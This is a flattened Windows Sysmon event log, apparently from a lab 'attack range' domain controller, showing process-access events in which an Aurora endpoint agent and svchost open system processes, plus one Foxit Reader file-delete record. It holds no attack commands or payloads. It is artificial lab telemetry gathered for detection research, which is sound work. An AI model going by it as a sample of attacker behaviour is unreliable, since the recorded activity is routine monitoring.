Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000136003D0) 10341000x800000000000000041754Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:34.833{FE4C2B44-DE08-63C7-F104-00000000AF02}60683364C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E0D1-63C7-5D05-00000000AF02}4176C:\Windows\system32\cmd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000136003D0) 10341000x800000000000000041753Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:34.831{FE4C2B44-DE08-63C7-F104-00000000AF02}60683364C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E02A-63C7-4705-00000000AF02}4708C:\Windows\system32\wbem\wmiprvse.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000136003D0) 10341000x800000000000000041752Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:34.823{FE4C2B44-DE08-63C7-F104-00000000AF02}60683364C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DE09-63C7-F204-00000000AF02}5228C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000136003D0) 10341000x800000000000000041751Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:34.810{FE4C2B44-DE08-63C7-F104-00000000AF02}60683364C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DE08-63C7-EF04-00000000AF02}6056C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000136003D0) 10341000x800000000000000041750Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:34.783{FE4C2B44-DE08-63C7-F104-00000000AF02}60683364C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000136003D0) 10341000x800000000000000041749Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:34.776{FE4C2B44-DE08-63C7-F104-00000000AF02}60683364C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF7-63C7-B504-00000000AF02}1332C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000136003D0) 23542300x800000000000000041748Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:34.776{FE4C2B44-E326-63C7-F905-00000000AF02}3260ATTACKRANGE\AdministratorC:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exeC:\ProgramData\Foxit Software\Foxit PDF Reader\FoxitSensor\Sensor.db-journalMD5=BFF5BD7C93EE58CD96DF08F6961FE955,SHA256=F97E96907D2BE04A49F686196C528DBA5FBA7D08EF5A29104651610D8135FF17,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000041747Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:34.767{FE4C2B44-DE08-63C7-F104-00000000AF02}60683364C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF7-63C7-B104-00000000AF02}5076C:\Windows\System32\rdpclip.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000136003D0) 10341000x800000000000000041746Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:34.762{FE4C2B44-DE08-63C7-F104-00000000AF02}60683364C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF5-63C7-A404-00000000AF02}4616C:\Windows\system32\dwm.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000136003D0) 10341000x800000000000000041745Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:34.760{FE4C2B44-DE08-63C7-F104-00000000AF02}60683364C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF4-63C7-A104-00000000AF02}4952C:\Windows\system32\winlogon.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000136003D0) 10341000x800000000000000041744Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:34.757{FE4C2B44-DE08-63C7-F104-00000000AF02}60683364C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA7E-63C7-F900-00000000AF02}4844C:\Windows\System32\msdtc.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000136003D0) 10341000x800000000000000041743Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:34.754{FE4C2B44-DE08-63C7-F104-00000000AF02}60683364C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA75-63C7-F400-00000000AF02}2900C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000136003D0) 10341000x800000000000000041742Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:34.751{FE4C2B44-DE08-63C7-F104-00000000AF02}60683364C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA6F-63C7-DB00-00000000AF02}4048C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000136003D0) 10341000x800000000000000041741Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:34.750{FE4C2B44-DE08-63C7-F104-00000000AF02}60683364C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA67-63C7-AE00-00000000AF02}4912C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000136003D0) 10341000x800000000000000041740Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:34.746{FE4C2B44-DE08-63C7-F104-00000000AF02}60683364C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000136003D0) 10341000x800000000000000041739Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:34.745{FE4C2B44-DE08-63C7-F104-00000000AF02}60683364C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA1C-63C7-7500-00000000AF02}3048C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000136003D0) 10341000x800000000000000041738Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:34.744{FE4C2B44-DE08-63C7-F104-00000000AF02}60683364C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA1C-63C7-7400-00000000AF02}3024C:\Windows\system32\WinrsHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000136003D0) 10341000x800000000000000041737Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:34.743{FE4C2B44-DE08-63C7-F104-00000000AF02}60683364C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA05-63C7-3E00-00000000AF02}3580C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000136003D0) 10341000x800000000000000041736Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:34.741{FE4C2B44-DE08-63C7-F104-00000000AF02}60683364C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA05-63C7-3B00-00000000AF02}3500C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000136003D0) 10341000x800000000000000041735Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:34.383{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892912C:\Windows\system32\svchost.exe{FE4C2B44-DE08-63C7-EF04-00000000AF02}6056C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+3a866|c:\windows\system32\rpcss.dll+3976a|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+45300|c:\windows\system32\rpcss.dll+456f2|c:\windows\system32\rpcss.dll+47fff|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000041734Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:34.383{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892912C:\Windows\system32\svchost.exe{FE4C2B44-DE08-63C7-EF04-00000000AF02}6056C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+39644|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+45300|c:\windows\system32\rpcss.dll+456f2|c:\windows\system32\rpcss.dll+47fff|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000041733Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:34.383{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892912C:\Windows\system32\svchost.exe{FE4C2B44-DE08-63C7-EF04-00000000AF02}6056C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+3a866|c:\windows\system32\rpcss.dll+3976a|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+45300|c:\windows\system32\rpcss.dll+456f2|c:\windows\system32\rpcss.dll+47fff|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000041732Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:34.383{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892912C:\Windows\system32\svchost.exe{FE4C2B44-DE08-63C7-EF04-00000000AF02}6056C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+39644|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+45300|c:\windows\system32\rpcss.dll+456f2|c:\windows\system32\rpcss.dll+47fff|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000041731Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:34.383{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892912C:\Windows\system32\svchost.exe{FE4C2B44-DE08-63C7-EF04-00000000AF02}6056C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+3a866|c:\windows\system32\rpcss.dll+3976a|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+45300|c:\windows\system32\rpcss.dll+456f2|c:\windows\system32\rpcss.dll+47fff|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000041730Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:34.383{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892912C:\Windows\system32\svchost.exe{FE4C2B44-DE08-63C7-EF04-00000000AF02}6056C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+39644|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+45300|c:\windows\system32\rpcss.dll+456f2|c:\windows\system32\rpcss.dll+47fff|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000041729Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:34.383{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892912C:\Windows\system32\svchost.exe{FE4C2B44-DE08-63C7-EF04-00000000AF02}6056C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+3a866|c:\windows\system32\rpcss.dll+3976a|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+45300|c:\windows\system32\rpcss.dll+456f2|c:\windows\system32\rpcss.dll+47fff|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000041728Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:34.383{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892912C:\Windows\system32\svchost.exe{FE4C2B44-DE08-63C7-EF04-00000000AF02}6056C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+39644|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+45300|c:\windows\system32\rpcss.dll+456f2|c:\windows\system32\rpcss.dll+47fff|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000041727Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:34.383{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892912C:\Windows\system32\svchost.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+3a866|c:\windows\system32\rpcss.dll+3976a|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+45300|c:\windows\system32\rpcss.dll+456f2|c:\windows\system32\rpcss.dll+47fff|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000041726Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:34.383{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892912C:\Windows\system32\svchost.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+39644|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+45300|c:\windows\system32\rpcss.dll+456f2|c:\windows\system32\rpcss.dll+47fff|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000041725Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:34.383{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892912C:\Windows\system32\svchost.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+3a866|c:\windows\system32\rpcss.dll+3976a|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+45300|c:\windows\system32\rpcss.dll+456f2|c:\windows\system32\rpcss.dll+47fff|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000041724Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:34.383{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892912C:\Windows\system32\svchost.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+39644|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+45300|c:\windows\system32\rpcss.dll+456f2|c:\windows\system32\rpcss.dll+47fff|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 